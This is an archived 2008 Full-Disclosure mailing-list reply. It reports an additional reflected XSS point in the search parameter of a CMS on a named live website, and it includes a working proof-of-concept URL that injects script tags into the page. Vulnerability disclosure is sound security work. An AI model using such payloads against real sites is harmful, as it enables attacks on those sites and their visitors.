[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] Multiple XSS Vulnerabilities in Self Generate CMS (K?rast)
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: Re: [Full-disclosure] Multiple XSS Vulnerabilities in Self Generate CMS (K?rast)
- From: devildeath1988@xxxxxx
- Date: Sun, 24 Aug 2008 19:46:12 -0400
Hi.
I Have found one more vulnerable value which is not cleaned before it would be
displayed.
When you search, there would be a POST value 'search=injection'.
It's like the page value.
See here:
http://www.ubuonline.co.uk/index.php?search=here%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E&go.x=0&go.y=%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E&go=Search
devildeath
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/